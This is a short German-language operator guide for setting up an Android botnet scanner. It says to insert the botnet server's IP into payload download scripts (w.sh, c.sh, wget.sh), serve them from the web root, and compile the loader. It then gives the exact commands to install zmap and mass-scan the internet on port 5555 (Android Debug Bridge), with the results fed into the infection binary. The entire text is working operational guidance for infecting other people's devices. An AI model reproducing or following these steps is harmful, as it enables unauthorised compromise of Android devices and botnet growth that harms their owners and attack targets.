Anleitung zum Scannen von Android-Bots:

Bearbeiten Sie die IPv4-Adresse des Botnetz-Servers in den drei Dateien w.sh, c.sh und wget.sh im Verzeichnis android/upload/.

Bearbeiten Sie außerdem die Datei main.c in Zeile 211 im Verzeichnis android/src/.

Verschieben Sie anschließend die drei Dateien w.sh, c.sh und wget.sh in das Verzeichnis /var/www/html des Botnetz-Servers.
Komprimieren Sie alle Dateien im Verzeichnis android zu einer Datei namens android.zip und laden Sie diese zum Scannen auf den VPS hoch.

Greifen Sie nun auf den Scan-Server zu und führen Sie folgende Befehle aus:

yum install unzip -y

yum install screen -y

Entpacken Sie die Datei android.zip in /root:

unzip android.zip

yum install epel-release -y
yum install zmap -y
yum install gcc gcc-c++ -y

sh build.sh

Erstellen Sie eine Datei scan.sh und fügen Sie folgenden Befehl ein:

ulimit -n 999999;ulimit -u999999; zmap -p 5555 -o- -q -v0 -T3 | awk {'print $1":5555"'} | ./android

Führen Sie die Datei anschließend mit dem Befehl screen sh scan.sh aus.